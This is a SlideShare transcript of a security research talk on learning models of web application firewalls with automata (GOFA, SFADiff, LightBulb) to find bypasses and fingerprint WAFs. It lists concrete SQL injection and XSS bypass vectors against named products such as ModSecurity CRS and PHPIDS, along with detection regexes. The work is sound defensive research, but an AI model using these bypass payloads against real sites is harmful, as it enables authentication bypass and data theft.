SlideShare a Scribd company logo
Another Brick off The Wall:
Deconstructing Web Application
Firewalls Using Automata Learning
George Argyros, Ioannis Stais
Joint Work with:
Suman Jana, Angelos D. Keromytis, Aggelos Kiayias
Overview
• A journey in the world of:
- Code Injection attacks.
- Web Application Firewalls.
- Parsers.
- Learning algorithms.
• And newly discovered vulnerabilities :)
Code Injection Attacks
• SQLi, XSS, XML, etc…
• Not going anywhere anytime soon.
• 14% increase in total web attacks in
Q2 2016 [1]
• 150% - 200% increase in SQLi and
XSS attacks in 2015 [2]
[1] akamai’s [state of the internet] / security Q2 2016 executive review
[2] Imperva: 2015 Web Application Attack Report (WAAR)
Code Injection is a Parsing
Problem
Web Application
Language
Runtime
Input data Injection attack
Code Injection is a Parsing
Problem
Web Application
Language
Runtime
Input data
Input data is parsed
incorrectly
Injection attack
Code Injection is a Parsing
Problem
Web application parsers are doing a really bad
job in parsing user inputs.
Web Application
Language
Runtime
Input data
Input data is parsed
incorrectly
Injection attack
Web Application Firewalls
(or solving parsing problems with parsing)
Web Application Firewalls
• Monitor traffic at the Application
Layer: Both HTTP Requests and
Responses.
• Detect and Prevent Attacks.
• Cost-effective compliance with PCI
DSS requirement 6.6 [1]
[1] PCI DSS v3.2
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
User
Input
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
User
Input
<ScRipt>alert(1);</ScRipT>
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
User
Input
<ScRipt>alert(1);</ScRipT>
<script>alert(1);</script>
Lower Case
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
User
Input
<ScRipt>alert(1);</ScRipT>
<script>alert(1);</script>
Lower Case
<script>alert(1);</script>
Matched Rule:
<script>.*</script>
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
User
Input
<ScRipt>alert(1);</ScRipT>
<script>alert(1);</script>
Lower Case
<script>alert(1);</script>
Matched Rule:
<script>.*</script>
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
Event
Correlation
Tokenising
User
Input
<ScRipt>alert(1);</ScRipT>
<script>alert(1);</script>
Lower Case
<script>alert(1);</script>
Matched Rule:
<script>.*</script>
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
Event
Correlation
Tokenising
User
Input
<ScRipt>alert(1);</ScRipT>
<script>alert(1);</script>
Lower Case
<script>alert(1);</script>
Matched Rule:
<script>.*</script>
1.<script>
2. alert(1);
3.</script>
WAFs Internals
Rulesets
Matching
Normalization
Attack
Mitigation
Event
Correlation
Tokenising
User
Input
<ScRipt>alert(1);</ScRipT>
<script>alert(1);</script>
Lower Case
<script>alert(1);</script>
Matched Rule:
<script>.*</script>
1.<script>
2. alert(1);
3.</script>
1. 4 Rules Matched
2. Session/User history
WAF Rulesets
• Signatures: Strings or Regular Expressions
E.g., [PHPIDS Rule 54] Detects Postgres pg_sleep injection, waitfor delay attacks and
database shutdown attempts:
(?:selects*pg_sleep)|(?:waitfors*delays?"+s?d)|(?:;s*shutdowns*(?:;|--|#|/*|{))
WAF Rulesets
• Signatures: Strings or Regular Expressions
• Rules: Logical expressions and Condition/Control Variables
E.g., ModSecurity CRS Rule 981254:
SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/
_pk_ref/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "(?i:(?:selects*?
pg_sleep)|(?:waitfors*?delays?["'`´’‘]+s?d)|(?:;s*?shutdowns*?(?:;|--|#|/*|{)))" “phase:
2,capture,t:none,t:urlDecodeUni,block, setvar:tx.sql_injection_score=
+1,setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{tx.msg}-
OWASP_CRS/WEB_ATTACK/SQLI-%{matched_var_name}=%{tx.0}'"
WAF Rulesets
• Signatures: Strings or Regular Expressions
• Rules: Logical expressions and Condition/Control Variables
• Virtual Patches: Application Specific Patches
E.g., ModSecurity: Turns off autocomplete for the forms on login and signup pages
SecRule REQUEST_URI "^(/login|/signup)" "id:1000,phase:4,chain,nolog,pass"
SecRule REQUEST_METHOD "@streq GET" "chain"
SecRule STREAM_OUTPUT_BODY "@rsub s/<form /<form autocomplete="off" /"
WAF Rulesets
• Signatures: Strings or Regular Expressions
• Rules: Logical expressions and Condition/Control Variables
• Virtual Patches: Application Specific Patches
• PHPIDS has more than 420K states
• Shared between different WAFs and Log Auditing Software: PHPIDS,
Expose, ModSecurity
Why Bypasses Exist
Why Bypasses Exist
- Simple hacks:
• Lack of support for different protocols, encodings, contents, etc
• Restrictions on length, character sets, byte ranges, types of
parameters, etc
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
PHPIDS 0.7.0
Rulesets
Matching
Normalization
’ ” ` ”
User
Input
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
PHPIDS 0.7.0
Rulesets
Matching
Normalization
’ ” ` ”
User
Input
x' onclick='a()'>
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
PHPIDS 0.7.0
Rulesets
Matching
Normalization
’ ” ` ”
User
Input
x' onclick='a()'>
"s*(src|style|onw+)s*=s*")
MATCHED!
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
Rulesets
Matching
Normalization
’ ” ` ”
User
Input
x' onclick='a()'>
"s*(src|style|onw+)s*=s*")
MATCHED!
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
Rulesets
Matching
Normalization
’ ” ` ”
User
Input
x' onclick='a()'>
"s*(src|style|onw+)s*=s*")
MATCHED!
Expose 2.4.0
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
Rulesets
Matching
’ ” ` ”
User
Input
x' onclick='a()'>
"s*(src|style|onw+)s*=s*")
MATCHED!
Expose 2.4.0
Why Bypasses Exist
- Rulesets sharing mistakes:
• Normalisation and Rulesets Failure
Rulesets
Matching
’ ” ` ”
User
Input
x' onclick='a()'>
"s*(src|style|onw+)s*=s*")
MATCHED!
Expose 2.4.0
BYPASS!
Why Bypasses Exist
- Critical WAF components are not being updated:
• E.g, ModSecurity libinjection library
Why Bypasses Exist
- Critical WAF components are not being updated:
• E.g, ModSecurity libinjection library
Why Bypasses Exist
- The Real Fundamental Reasons:
• Insufficient Signatures & Weak Rules
• Detecting vulnerabilities without context is HARD
Our Goal
1. Formalize knowledge in code injection attacks variations
using context free grammars and automata.
2. Use Learning algorithms to expand this knowledge by
inferring system specifications.
Using parsers to
break parsers
Regular Expressions and
Finite Automata
Every regular expression can be converted to a
Deterministic Finite Automaton.
(.*)man
Context Free Grammars
• Superset of Regular Expressions.
• Mostly used to write programming
languages parsers.
• Equivalent to a DFA with a stack.
• Can be used to count.
- Example: matching parentheses.
E → N
E → E Op E
E → ( E )
N → N N
Op → +
Op → -
Op → *
Op → /
N → [0-9]
} Non
Terminals
}Terminals
Attack of the Grammars
• Context Free Grammars can be used to encode attack vectors.
• Assume we would like to inject code into the query:
- “SELECT * FROM users WHERE id=$id;”
• The valid suffixes (injections) for this query can be encoded as a
CFG!
Cross checking regular expressions with grammars is easy!
Why should I care?
Context Free
Grammar G
Regular Expression Fvs
SQL Injections WAF Filter
Find an SQL Injection attack in the Grammar G
which is not rejected by the filter F
However…
• In reality, we do not know the language parsed by most
implementations.
- MySQL is parsing a different SQL flavor than MS-SQL.
- Browsers are definitely not parsing the HTML standard.
- WAFs are doing much more than a simple RE matching.
Learning to Parse
• Our Approach: Use Learning algorithms in order to infer the
specifications of parsers and WAFs.
- Cross check the inferred models for vulnerabilities.
• By using learning we can actively figure out important details of the
systems.
Learning Automata
Learning Automata
• Active Learning algorithm.
- Instead of learning from corpus of data, query the program
with input of his choice.
• Eventually a model is generated.
• Discovered inconsistencies of the model is used to refine it.
Learning Model
Learning
Algorithm
Parser P
Learning Model
Learning
Algorithm
Parser P
Membership Query
Learning Model
Learning
Algorithm
string s
Is s accepted by P?
Parser P
Membership Query
Learning Model
Learning
Algorithm
Model H
string s
Is s accepted by P?
Parser P
Membership Query
Learning Model
Learning
Algorithm
Model H
string s
Is s accepted by P?
Parser P
Learning Model
Learning
Algorithm
Model H
string s
Is s accepted by P?
Parser P
Equivalence Query
Learning Model
Learning
Algorithm
Model H
string s
Is s accepted by P?
Parser P
Equivalence
Oracle
Is H a correct model of P?
Yes, or provide counterexample.
Equivalence Query
Learning Model
Learning
Algorithm
Model H
string s
Is s accepted by P?
Parser P
Equivalence
Oracle
Is H a correct model of P?
Yes, or provide counterexample.
Learning DFAs
• Angluin’s algorithm is an active learning algorithm for learning
DFAs.
• Learns the target DFA using a table data structure called the
observation table.
• Let’s use it to learn the regular expression (.*)<a(.*)
- Aggressive filtering of anchor tags.
Learning DFAs
OT ε
ε
ε<
εa
Learning DFAs
OT ε
ε
ε<
εa
Empty string
Learning DFAs
OT ε
ε
ε<
εa
Strings for “testing”
states.
(Distinguishing strings)
Empty string
Learning DFAs
OT ε
ε
ε<
εa
Strings for “testing”
states.
(Distinguishing strings)
Strings accessing
different states in the
target automaton.
(Access Strings)
Empty string
Learning DFAs
OT ε
ε
ε<
εa
Strings for “testing”
states.
(Distinguishing strings)
Strings accessing
different states in the
target automaton.
(Access Strings)
Strings which
transition from
the above states.
Empty string
Learning DFAs
OT ε
ε
ε<
εa
Strings for “testing”
states.
(Distinguishing strings)
Strings accessing
different states in the
target automaton.
(Access Strings)
Strings which
transition from
the above states.
An entry is filled by
concatenating the row
and column string and
filling with the output of
the automaton.
Empty string
Learning DFAs
OT ε
ε
ε<
εa
Model:
Target: < a
<,a
<
a
> ε < <a
q_0
q_0
trans.
Learning DFAs
OT ε
ε
ε<
εa
Model:
Target: < a
<,a
<
a
> ε < <a
OT ε
ε 0
ε< 0
εa 0
q_0
q_0
trans.
Learning DFAs
OT ε
ε
ε<
εa
Model:
Target: < a
<,a
<
a
> ε < <a
OT ε
ε 0
ε< 0
εa 0
q_0
q_0
trans.
Learning DFAs
OT ε
ε
ε<
εa
Model:
Target: < a
<,a
<
a
> ε < <a
a,<
> ε
OT ε
ε 0
ε< 0
εa 0
q_0
q_0
trans.
Equivalence Query
< a
<,a
<
a
> ε < <a
a,<
> ε =?
Counterexample
analysis
aCE: <aaa<<a Add a new column with
character “a” in the OT.
Learning DFAs
OT ε a
ε 0
ε< 0
εa 0
Model:
Target: < a
<,a
<
a
> ε < <a
q_0
q_0
trans.
Learning DFAs
OT ε a
ε 0
ε< 0
εa 0
Model:
Target: < a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
εa 0 0
q_0
q_0
trans.
Learning DFAs
OT ε a
ε 0
ε< 0
εa 0
Model:
Target: < a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
εa 0 0
Must be a
new state
q_0
q_0
trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
εa 0 0
ε< 0 1
<a
<<
Model:
Target: < a
<,a
<
a
> ε < <a
q_0
q_1
q_0
Trans.
q_1
Trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
εa 0 0
ε< 0 1
<a
<<
Model:
Target: < a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
q_0
q_1
q_0
Trans.
q_1
Trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
εa 0 0
ε< 0 1
<a
<<
Model:
Target: < a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
Must be a
new state
q_0
q_1
q_0
Trans.
q_1
Trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa
<a<
Model:
Target:
< a
<,a
<
a
> ε < <a
q_0
q_1
q_2
q_2
trans.
q_1
trans.
q_0
trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa
<a<
Model:
Target:
< a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa 1 1
<a< 1 1
q_0
q_1
q_2
q_2
trans.
q_1
trans.
q_0
trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa
<a<
Model:
Target:
< a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa 1 1
<a< 1 1
states
q_0
q_1
q_2
q_2
trans.
q_1
trans.
q_0
trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa
<a<
Model:
Target:
< a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa 1 1
<a< 1 1
states
transitions
q_0
q_1
q_2
q_2
trans.
q_1
trans.
q_0
trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa
<a<
Model:
Target:
< a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa 1 1
<a< 1 1
states
transitions
q_0
q_1
q_2
q_2
trans.
q_1
trans.
q_0
trans.
Learning DFAs
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa
<a<
Model:
Target:
< a
<,a
<
a
> ε < <a
< a
<,a
<
a
> ε < <a
OT ε a
ε 0 0
ε< 0 1
<a 1 1
εa 0 0
ε< 0 1
<a 1 1
<< 0 1
<aa 1 1
<a< 1 1
states
transitions
q_0
q_1
q_2
q_2
trans.
q_1
trans.
q_0
trans.
Learning DFAs
• This algorithm is inefficient for large alphabets/automata.
• For just one PHPIDS Rule (id. 72):
• ((={s}*(top|this|window|content|self|frames|_content))|(/{s}*[gimx]*{s}*[)}])|([^ ]{s}*={s}*script)|(.{s}
*constructor)|(default{s}+xml{s}+namespace{s}*=)|(/{s}*+[^+]+{s}*+{s}*/))
- 72 states when represented as a DFA.
- The OT will have ~650k entries.
• We need a faster algorithm in order to check real systems!
Symbolic Finite Automata
✓ Efficient modeling of large
alphabets.
✓ We designed a novel,
efficient learning algorithm.
✓ Details in the whitepaper!
Bootstrapping Automata Learning
• Similar concept with seed inputs in fuzzers.
- Provide sample inputs and learning algorithm will
discover additional states in the parser.
• Utilize previously inferred models, specifications, etc.
• Seed inputs are guiding the learning algorithm.
• Details in the white paper!
Grammar Oriented Filter Auditing
(GOFA)
Grammar Oriented Filter Auditing
• Assume that we are given a grammar with attacks.
• How do we utilize it with the learning algorithm?
Main idea:
Use the grammar to drive the learning procedure.
Grammar Oriented Filter Auditing
…
select_exp: SELECT name
any_all_some: ANY | ALL
column_ref: name
parameter: name
Context Free
Grammar G
Learning
Algorithm
Grammar Oriented Filter Auditing
…
select_exp: SELECT name
any_all_some: ANY | ALL
column_ref: name
parameter: name
Context Free
Grammar G
Step 1:
Learn a model of the WAF.
Learning
Algorithm
Grammar Oriented Filter Auditing
…
select_exp: SELECT name
any_all_some: ANY | ALL
column_ref: name
parameter: name
Context Free
Grammar G
Step 1:
Learn a model of the WAF.
Learning
Algorithm
Grammar Oriented Filter Auditing
…
select_exp: SELECT name
any_all_some: ANY | ALL
column_ref: name
parameter: name
Context Free
Grammar G
Step 1:
Learn a model of the WAF.
Learning
Algorithm
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
Step 2:
Find a vulnerability in the model using the grammar.
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
Step 3:
Verify WAF vulnerability.
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
Step 3:
Verify WAF vulnerability.
Candidate Bypass
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
Candidate Bypass
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
Candidate Bypass
Step 4:
or refine model and repeat.
WAF
Model
Grammar Oriented Filter Auditing
Context Free
Grammar G
Learning
Algorithmvs
Candidate Bypass
Step 4:
or refine model and repeat.
counterexample (false positive)
WAF
Model
Vulnerabilities
GOFA SQL Injections
• Grammar for extending search conditions:
select * from users where user = admin and email = $_GET[c]
GOFA SQL Injections
S: A main

main: search_condition 

search_condition: OR predicate | AND predicate 

predicate: comparison_predicate | between_predicate | like_predicate | test_for_null | in_predicate
| all_or_any_predicate | existence_test

comparison_predicate: scalar_exp comparison scalar_exp | scalar_exp COMPARISON subquery

between_predicate: scalar_exp BETWEEN scalar_exp AND scalar_exp

like_predicate: scalar_exp LIKE atom 

test_for_null: column_ref IS NULL

in_predicate: scalar_exp IN ( subquery ) | scalar_exp IN ( atom ) 

all_or_any_predicate: scalar_exp comparison any_all_some subquery

existence_test: EXISTS subquery

scalar_exp: scalar_exp op scalar_exp | atom | column_ref | ( scalar_exp ) 

atom: parameter | intnum 

subquery: select_exp

select_exp: SELECT name

any_all_some: ANY | ALL | SOME

column_ref: name

parameter: name

intnum: 1

op: + | - | * | / 

comparison: = | < | > 

name: A
• Grammar for extending search conditions:
select * from users where user = admin and email = $_GET[c]
GOFA SQL Injections
• Authentication bypass using the vector: or exists (select 1)
Example:
select * from users where username = $_GET['u'] and password = $_GET['p];
select * from users where username = admin and password = a or exists (select 1)
Affected: ModSecurity Latest CRS, PHPIDS, WebCastellum, Expose
GOFA SQL Injections
• Authentication bypass using the vector: 1 or a = 1
1 or a like 1
Example:
select * from users where username = $_GET['u'] and password = $_GET['p];
select * from users where username = admin and password = 1 or isAdmin like 1
Affected: ModSecurity Latest CRS, PHPIDS (only for statement with ‘like’),
WebCastellum, Expose
GOFA SQL Injections
• Columns/variables fingerprinting using the vectors: and exists (select a)
a or a > any select a
Example:
select * from users where username = admin and id = $_GET['u'];
select * from users where username = admin and id = 1 and exists (select email)
Affected: ModSecurity Latest CRS, PHPIDS, WebCastellum, Expose
GOFA SQL Injections
• Grammar for extending select queries:
select * from users where user = $_GET[c]
GOFA SQL Injections
S: A main

main: query_exp

query_exp: groupby_exp | order_exp | limit_exp | procedure_exp | into_exp | for_exp |
lock_exp | ; select_exp | union_exp | join_exp

groupby_exp: GROUP BY column_ref ascdesc_exp

order_exp: ORDER BY column_ref ascdesc_exp

limit_exp: LIMIT intnum

into_exp: INTO output_exp intnum

procedure_exp: PROCEDURE name ( literal )

literal: string | intnum

select_exp: SELECT name

union_exp: UNION select_exp

ascdesc_exp: ASC | DESC

column_ref: name

join_exp: JOIN name ON name

for_exp: FOR UPDATE

lock_exp: LOCK IN SHARE MODE

output_exp: OUTFILE | DUMPFILE

string: name

intnum: 1

name: A
• Grammar for extending select queries:
select * from users where user = $_GET[c]
GOFA SQL Injections
• Data retrieval bypass using the vector: 1 right join a on a = a
Example:
select * from articles left join authors on author.id=$_GET['id']
select * from articles left join authors on author.id= 1 right join users on author.id =
users.id
Affected: ModSecurity Latest CRS, WebCastellum
GOFA SQL Injections
• Columns/variables fingerprinting using the vectors: a group by a asc
Example:
select * from users where username = $_GET['u'];
select * from users where username = admin group by email asc
Affected: ModSecurity Latest CRS, PHPIDS, WebCastellum, Expose
GOFA SQL Injections
• Columns/variables fingerprinting using the vectors: procedure a (a)
Example:
select * from users where username = $_GET['u'];
select * from users where username = admin procedure analyze()
Affected: libInjection
SFADiff: Learning Attack Vectors
SFADiff
• Available grammars are not always good for finding vulnerabilities.
• Most XSS bypasses result from attack vectors deviating from the HTML
standard.
- <IMG SRC=“jav&#x09;ascript:alert(‘XSS');">
- Tons of other examples.
• Use the same learning approach to infer the HTML parser specification!
SFADiff
WAF
Browser
SFADiff
WAF
Browser
Automata
Learner
Automata
Learner
SFADiff
WAF
Browser
Automata
Learner
Automata
Learner
SFADiff
WAF
Browser
WAF
model
HTML
Model
Automata
Learner
Automata
Learner
SFADiff
WAF
Browser
vs
WAF
model
HTML
Model
Automata
Learner
Automata
Learner
SFADiff
WAF
Browser
vs
WAF
model
HTML
Model
Automata
Learner
Automata
Learner
candidate bypasses
candidate bypasses
SFADiff
WAF
Browser
vs
WAF
model
HTML
Model
counterexamples
Automata
Learner
Automata
Learner
candidate bypasses
candidate bypasses
SFADiff
WAF
Browser
vs
WAF
model
HTML
Model
counterexamples
Bypasses
Automata
Learner
Automata
Learner
candidate bypasses
candidate bypasses
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AUTOMATA LEARNING
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AUTOMATA LEARNING
ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AUTOMATA LEARNING
SFADiff XSS Bypass
• XSS Attack vectors in PHPIDS 0.7/ Expose 2.4.0
<p onmouseover=-a() ></p>
<p onmouseover=(a()) ></p>
<p onmouseover=;a() ></p>
<p onmouseover=!a() ></p>
• Other types of events can also be use used for the attack (e.g. "onClick").
• Rules 71, 27, 2 and 65 are related to this insufficient pattern match.
Bonus:
Fingerprinting WAFs
Generating Program Fingerprints
P_T
P_1 P_2 P_N…
Generating Program Fingerprints
P_T
P_1 P_2 P_N…
Which program is running in
the Black-box?
Generating Program Fingerprints
P_T
P_1 P_2 P_N…
Generating Program Fingerprints
P_T
SFADiff
P_1 P_2 P_N…
Generating Program Fingerprints
P_T
SFADiff
P_1 P_2 P_N…
Generating Program Fingerprints
P_T
SFADiff
P_1 P_2 P_N…
Input causing difference in P_1, P_2
Generating Program Fingerprints
P_T
SFADiff
P_1 P_2 P_N…
P_i
Input causing difference in P_1, P_2
Generating Program Fingerprints
P_T
SFADiff
P_1 P_2 P_N…
P_i
Generating Program Fingerprints
P_T
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
Generating Program Fingerprints
P_T
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
Generating Program Fingerprints
P_T
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
Input causing difference
Generating Program Fingerprints
P_T
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
Input causing difference
Generating Program Fingerprints
P_T
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
Generating Program Fingerprints
P_T
SFADiff
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
Generating Program Fingerprints
P_T
SFADiff
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
Generating Program Fingerprints
P_T
SFADiff
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
Input causing difference
Generating Program Fingerprints
P_T
SFADiff
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
P_T
Input causing difference
Generating Program Fingerprints
P_T
SFADiff
SFADiff
SFADiff
P_1 P_2 P_N…
P_i
P_j
P_T
“etc/<”
“:%0o”
“:/B”
“%23%0A”
“;”
Webcastelum 1.8.4
“etc/,#”
PHPIDS 0.6.5
“:et#”
PHPIDS 0.5.0
PHPIDS 0.6.4
ModSecurity 2.9.1
PHPIDS 0.6.3
Expose 2.4.0
PHPIDS 0.4.0
✘
✔
✔
✘
✘
✔
✔
✘
✔
✔
✘
✘
✘
✔
LightBulb
Modular Design
• Core Modules:
• Use automata models and operations
• Extend the SFA learning algorithm
• Built-in Query Handlers:
• Perform membership queries
• Modules (and Built-in Modules):
• Use the Built-in Query Handlers
• Extend the Core Modules: GOFA, SFADiff
• Library:
• Set of grammars, filters, fingerprints trees and configurations
Core Modules
• Extend SFA Learning algorithm:
• Accept the Alphabet, a Seed and/or a Tests file and a Query handler.
• Initialise learning and manage results and models
• The Alphabet: Set of characters to be used
• The Seed File: Knowledge of what the examined inputs should look like
• The Tests File: Knowledge of specialised attacks
• The Query Handler/Function: Knowledge of how to perform queries for selected
inputs
Core Modules
• GOFA:
• Grammar Oriented Filter Auditing.
• SFADiff:
• A black-box differential testing framework based on Symbolic
Finite Automata (SFA) learning.
Simple Structure: Class with five (5) basic functions:
setup(), learn(), query(), getresults(), stats()
Built-in Query Handlers
• HTTP Request Handler:
• Perform queries on WAF filters and Sanitizers
• SQL Query Handler:
• Perform queries on MySQL Parser
• Browser Parser Handler:
• Perform queries on Browser JavaScript Parsers
• Browser Filter Handler:
• Perform queries on Browser Anti-XSS Filters
HTTP Request Handler
• Targets WAF Filter
• Requires URL, HTTP Request Type, Parameter and Block
or Bypass Signature
Core Module
GOFA
Initialize
WAF
HTTP
Request Handler
MODULE
HTTP
GET /?parameter=Payload
Block/Bypass Signature
Query
True/False
HTTP
Protocol
MySQL Query Handler
Core Module
GOFA
Initialize
MySQL
Database
SQL Handler
MODULE
Prefix Query + Payload
Result or Empty
Query
True/False
MySQL DB
Driver
• Targets MySQL Database Parser
• Requires Database Credentials
• Requires Prefix Query: e.g, “SELECT a FROM a WHERE a=**”
Browser Parser Handler
Core Module
GOFA
Initialize
Browser
Handler
MODULE
Query
True/False
HTTP Protocol and WebSockets
• Targets the Browser HTML and JavaScript Parsing Engine
• Requires web sockets port, web browser port, host and trigger delay
• Inputs must trigger function a() (e.g., <script>a();</script>)
WEB
BROWSER
Web Server
Web Socket
Server
HTTP
G
ET
Payload PayloadTrue/False
True/False
HTML Page
Browser Filter Handler
Core Module
GOFA
Initialize
Browser
Filter
Handler
MODULE
Query
True/False
HTTP Protocol, WebSockets &
Cross Origin Message Events
• Targets the Browser Anti-XSS Filter, HTML and JavaScript Parsing Engine
Web Server
Web Socket
Server
Payload
True/False
HTTP GET /?
parameter=Payload
Payload
True/False
IFRAME
HTTP
GET
WEB
BROWSER
Query
HTML Page
True/False
LoadQuery
HTML Page
Using GOFA module and HTTP Handler
Using GOFA module and HTTP Handler
use HTTPHandler as my_query_handler

define URL http://83.212.105.5/PHPIDS07/

define BLOCK impact

back
Using GOFA module and HTTP Handler
use HTTPHandler as my_query_handler

define URL http://83.212.105.5/PHPIDS07/

define BLOCK impact

back
Query Handler was created.
We now can perform
membership requests.
Using GOFA module and HTTP Handler
use HTTPHandler as my_query_handler

define URL http://83.212.105.5/PHPIDS07/

define BLOCK impact

back
use GOFA as my_gofa

define TESTS_FILE {library}/regex/PHPIDS070/12.y

define HANDLER my_query_handler

back
Query Handler was created.
We now can perform
membership requests.
Using GOFA module and HTTP Handler
use HTTPHandler as my_query_handler

define URL http://83.212.105.5/PHPIDS07/

define BLOCK impact

back
use GOFA as my_gofa

define TESTS_FILE {library}/regex/PHPIDS070/12.y

define HANDLER my_query_handler

back
Query Handler was created.
We now can perform
membership requests.
Algorithm was selected and
populated.
Know we can learn
application states.
Using GOFA module and HTTP Handler
use HTTPHandler as my_query_handler

define URL http://83.212.105.5/PHPIDS07/

define BLOCK impact

back
use GOFA as my_gofa

define TESTS_FILE {library}/regex/PHPIDS070/12.y

define HANDLER my_query_handler

back
start my_gofa
Query Handler was created.
We now can perform
membership requests.
Algorithm was selected and
populated.
Know we can learn
application states.
Built-in Modules
• WAF Fingerprints Tree Generator:
• Automatically generates a fingerprints tree for a set of WAFs
• WAF Distinguisher:
• Identifies a WAF using a set of fingerprints trees
• Model Operations:
• Perform automata operations on stored models, input filters and
grammars
• Browser and WAF Differential Testing:
• Queries both Browser and WAF using a predefined set of strings
Built-in Rulesets Library
• Regular Expressions
• Set of WAF filters, and attack models in the form of regular
expressions
• Grammars:
• Set of grammars that can be used for GOFA algorithm.
• Fingerprints Trees:
• Set of fingerprints trees for a predefined number of WAFs.
• Configurations:
• Sample configurations for WAF distinguish tree generation
Grub LightBulb:
https://github.com/lightbulb-framework/
Future Work
• Currently building many optimizations.
- Learning will be much faster in the next months.
- Cross checking models is also getting better.
• Incorporate fuzzers to improve models.
• New ideas?
Conclusions
• Current state of WAFs is still (very) ugly.
- Many low hanging fruits.
• Our vision is to enforce a standard for such products.
- WAFs must effectively defend against inferred language specifications.
- Learning can run continuously with the assistance of fuzzers.
• We have a similar line of work on sanitizers.
Another Brick off The Wall:
Deconstructing Web Application
Firewalls Using Automata Learning
George Argyros, Ioannis Stais
Joint Work with:
Suman Jana, Angelos D. Keromytis, Aggelos Kiayias

More Related Content

PDF
Customer information security awareness training
PPT
Phishing
PDF
State machines for gesture recognition
PPT
Component Based Testing Using Finite Automata
PDF
Component Based Model Driven Development of Mission Critical Defense Applicat...
PPT
Deterministic Finite Automata
PPT
Introduction to fa and dfa
PPTX
automated teller machines
Customer information security awareness training
Phishing
State machines for gesture recognition
Component Based Testing Using Finite Automata
Component Based Model Driven Development of Mission Critical Defense Applicat...
Deterministic Finite Automata
Introduction to fa and dfa
automated teller machines

Similar to ANOTHER BRICK OFF THE WALL: DECONSTRUCTING WEB APPLICATION FIREWALLS USING AUTOMATA LEARNING (20)

PDF
Lie to Me: Bypassing Modern Web Application Firewalls
PDF
Injecting Security into vulnerable web apps at Runtime
PDF
Technical Architecture of RASP Technology
PDF
Behind an Application Firewall, Are we Safe from SQL Injection Attacks?
PDF
Внедрение безопасности в веб-приложениях в среде выполнения
PDF
Как разработать DBFW с нуля
PDF
Обход файрволов веб-приложений
PPTX
Database Firewall from Scratch
PPTX
Speaking 'Development Language' (Or, how to get your hands dirty with technic...
PPTX
